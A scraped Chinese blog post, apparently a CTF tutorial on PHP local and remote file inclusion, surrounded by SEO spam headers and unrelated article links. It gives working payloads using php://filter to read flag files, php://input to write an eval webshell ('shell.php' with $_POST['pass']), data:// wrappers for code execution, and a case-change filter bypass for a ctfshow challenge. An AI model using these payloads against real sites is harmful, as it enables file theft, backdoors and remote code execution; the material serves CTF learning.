当前位置: 首页 > news >正文

移动端开发需要什么技术陕西seo主管

移动端开发需要什么技术,陕西seo主管,公司官网定制,视频网站怎么做的前言 文件包含漏洞 原理就是包含的文件如果可控就会造成这个漏洞 php文件包含的特征 : PHP:include、require、include_once、require_once等 一共是分为了2 种 一个就是 远程文件包含 这个的前提是php开启了 远程文件上传这个选项 原理应用就是…

前言

文件包含漏洞   原理就是包含的文件如果可控就会造成这个漏洞

php文件包含的特征 : PHP:include、require、include_once、require_once等

一共是分为了2 种  一个就是

远程文件包含

这个的前提是php开启了 远程文件上传这个选项

原理应用就是

因为这个非常鸡肋我就不多说了

本地文件包含漏洞

本地文件的包含 就是利用本地存在的文件

配合文件上传 进行后门的访问

   如果本地文件没有可利用的

1、伪协议利用(ctf 常考)

利用伪协议读取文件

第一个就是我们的

文件的读取

file://D:\\xx.txt                    //这个不常用的原因就是 就是需要绝对路径

php://filter/read=convert.base64-encode/resource=flag.php   //这个只需要相对路径 但是读取的内容会进行 base64加密

演示一下  例题是ctf show文件包含漏洞的第一个题

因为不知道绝对路径所以直接 使用 filter 

发现爆错了    那这种情况就需要我们继续上上一级找    php://filter/read=convert.base64-encode/resource=../../flag.txt

发现没有就再猜一下  php://filter/read=convert.base64-encode/resource=flag.php     base64解码出来就是了

文件的写入

php//:input   POST(这个是后边的数据的传入)  <?php fputs(fopen("shell.php","w") , '<?php @eval($_POST["pass"]?>'?>

条件:需要开启远程文件包含

接着使用上边这个题

执行看见了 flag   

两个方法打开 : 1、 cat

右键查看源码来

2、tac 读取

php://filter/write=convert.base64-encode/resource=phpinfo.php             POST: 
然后post 传入的文件写入语句必须是base64加密的                                前提是有   file_put_contents( )

练习:接着使用上边这个题

爱博士我的后门呢  什么情况啊  这个就是因为后台代码没有          file_put_contents($_GET['file'] ) 这个代码

代码执行

php://input   也可以执行代码的执行

php://input  
php://input    POST:<?php phpinfo();?>

还有一个就是这个data

data://text/plain,<?php phpinfo();?>
data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

上边这个题我们使用 data 玩一玩

这个的特点就是不用写在 post里面

当然这个也可以绕过演示一个

ctf show 入门  web79

演示一下

禁用了 php  我们还有代码执行 data

这边直接把php换成 = 就行了

第二种做法

input大小写绕过

文件包含除了上边这些还有   2、日志文件的读取  3、session文件竞争  下个文章写

http://www.hkea.cn/news/475337/

相关文章:

  • 做网站工作都包括什么企业网站搭建
  • 自己可以进行网站建设吗河北网站推广
  • 网站建设与管理论文seo整站怎么优化
  • 西安做网站收费价格网站流量监控
  • 福州网站制作有限公司南京疫情最新情况
  • 国外品牌设计网站天津疫情最新消息
  • 宁波有做网站的地方吗seo报价单
  • 深圳企业网站开发中国法律服务网app最新下载
  • 大连企业网站建站国外域名注册网站
  • 站长工具seo综合查询权重百度在线搜索
  • 伊犁网站建设评价怎样才能上百度
  • 房地产网站建设方案百度实名认证
  • 做外贸可以在哪些网站注册网络项目免费的资源网
  • 中国建设银行信用卡网站首页青岛关键词优化平台
  • 阿里云网站建设考试题目长沙网站推广服务公司
  • 甘肃建设项目审批权限网站俄罗斯搜索引擎yandex官网入口
  • 网站建设公司新员工培训ppt模板百度热门搜索排行榜
  • 仿魔客吧网站模板网址大全是ie浏览器吗
  • 网站产品后台界面怎么做湖南关键词排名推广
  • 网站数据每隔几秒切换怎么做的湖南百度seo排名点击软件
  • 网站制作先学什么百度新闻下载安装
  • 河南省网站建设哪家好免费观看行情软件网站进入
  • 粘合剂东莞网站建设体育热点新闻
  • 百度网站排名关键词整站优化培训网站建设
  • 网络平台代理seo外包 杭州
  • 东方头条网站源码免费推广软件工具
  • 北京网站建设公司分享网站改版注意事项流程优化四个方法
  • 案例学 网页设计与网站建设手机百度seo快速排名
  • 江门网站建设总部电话产品推广渠道有哪些
  • 网站建设全攻略站长之家ping检测